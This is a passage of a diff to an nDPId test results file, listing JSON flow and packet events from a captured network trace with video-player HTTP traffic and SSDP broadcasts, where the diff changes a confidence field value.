iBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7580000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=30&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353185&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7580000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=30&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353185&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1467353186002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353186002,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5ehdAADMGwC\/KbA7bwKhzCABQxUdzEkFurBLg+VAYADiXAQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1467353186830,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353186830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUoAAAQRyynAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353187172,"flow_last_seen":1467353187172,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353187172,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1467353187172,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353187172,"pkt":"AQBef\/\/6jHNut5ODCABFAAChAgsAAAERAYPAqAUc7\/\/\/+up3B2wAjbFHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353187172,"flow_last_seen":1467353187172,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353187172,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353187172,"flow_last_seen":1467353187172,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353187172,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1467353189325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353189325,"pkt":"TF4M6gNlABxCjnAxCABFAAC4LaNAAIAGT77AqHMI3xpqE8VJAFB9cer6SbS1WFAYQTc4sgAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL2Rvd25sb2FkZXIuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IERvd25sb2FkZXINCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloader.ini","code":0,"content_type":"","user_agent":"Downloader"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloader.ini","code":0,"content_type":"","user_agent":"Downloader"}} 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1147,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1467353189328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":566,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":566,"pkt_l4_len":532,"thread_ts_msec":1467353189328,"pkt":"ABxCjnAxTF4M6gNlCABFAAIolNRAADgGLx3fGmoTwKhzCABQxUlJtLVYfXHrilAYAB9+agAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoyOCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTcwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjM1OjQzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45OA0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW0NvbnRyb2xdDQphcHA9ZWd1aSxla3JuLG5vZDMya3VpLG5vZDMya3JuDQpjb3VudD0xDQpjMD1Eb3dubG9hZEhlbHBlcg0KW0Rvd25sb2FkZXJdDQpEb3dubG9hZEhlbHBlcj1odHRwOi8vc3RhdGljLnFpeWkuY29tL2V4dC9jb21tb24vcWlzdTIvRG93bmxvYWRIZWxwZXIuZGxsO1N0YXJ0O1FJWUk="} 00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1467353189360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1467353189360,"pkt":"TF4M6gNlABxCjnAxCABFAAC8LbBAAIAGT63AqHMI3xpqE8VJAFB9ceuKSbS3WFAYQLejygAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL0Rvd25sb2FkSGVscGVyLmRsbCBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBEb3dubG9hZGVyDQpIb3N0OiBzdGF0aWMucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1467353189363,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353189363,"pkt":"TF4M6gNlABxCjnAxCABFAAOkLbJAAIAGvJjAqHMIymwO7MVIAFBYgFOZMQ8QiVAYQTddVQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODcwNTMmc2g9JnNxPSZzdz0mdD0zcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353187053&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353187053&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189784,"flow_last_seen":1467353189784,"flow_idle_time":200000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1467353189784,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01016{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1467353189784,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":473,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":473,"pkt_l4_len":439,"thread_ts_msec":1467353189784,"pkt":"AQBef\/\/6cBiLE+IdCABFAAHLI6UAAAER3rTAqAUm7\/\/\/+gdsB2wBt3SETk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVwbnA6cm9vdGRldmljZQ0KTlRTOnNzZHA6YWxpdmUNCkxvY2F0aW9uOmh0dHA6Ly8xOTIuMTY4LjUuMzg6Mjg2OS91cG5waG9zdC91ZGhpc2FwaS5kbGw\/Y29udGVudD11dWlkOjJmNjg4ZWNlLWMwYjEtNDEwNC1iOWU1LWNiY2VlNTAzZTZiNA0KVVNOOnV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0Ojp1cG5wOnJvb3RkZXZpY2UNCkNhY2hlLUNvbnRyb2w6bWF4LWFnZT05MDANClNlcnZlcjpNaWNyb3NvZnQtV2luZG93cy82LjIgVVBuUC8xLjAgVVBuUC1EZXZpY2UtSG9zdC8xLjANCk9QVDoiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzowMDI4NWJjM2MzYmEyMDcwMDdlMWMzYjc2MjFjODQ3Ng0KDQo="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189784,"flow_last_seen":1467353189784,"flow_idle_time":200000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1467353189784,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189784,"flow_last_seen":1467353189784,"flow_idle_time":200000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1467353189784,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1394,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189820,"flow_last_seen":1467353189820,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353189820,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1394,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1467353189820,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353189820,"pkt":"AQBef\/\/6SNIkYwreCABFAAChDksAAAER9TXAqAUp7\/\/\/+sTGB2wAjdbrTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1394,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189820,"flow_last_seen":1467353189820,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353189820,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1394,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189820,"flow_last_seen":1467353189820,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353189820,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 01027{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1395,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1467353189831,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":482,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":482,"pkt_l4_len":448,"thread_ts_msec":1467353189831,"pkt":"AQBef\/\/6cBiLE+IdCABFAAHUI6YAAAER3qrAqAUm7\/\/\/+gdsB2wBwIVJTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpOVFM6c3NkcDphbGl2ZQ0KTG9jYXRpb246aHR0cDovLzE5Mi4xNjguNS4zODoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpVU046dXVpZDoyZjY4OGVjZS1jMGIxLTQxMDQtYjllNS1jYmNlZTUwM2U2YjQNCkNhY2hlLUNvbnRyb2w6bWF4LWFnZT05MDANClNlcnZlcjpNaWNyb3NvZnQtV2luZG93cy82LjIgVVBuUC8xLjAgVVBuUC1EZXZpY2UtSG9zdC8xLjANCk9QVDoiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzowMDI4NWJjM2MzYmEyMDcwMDdlMWMzYjc2MjFjODQ3Ng0KDQo="} 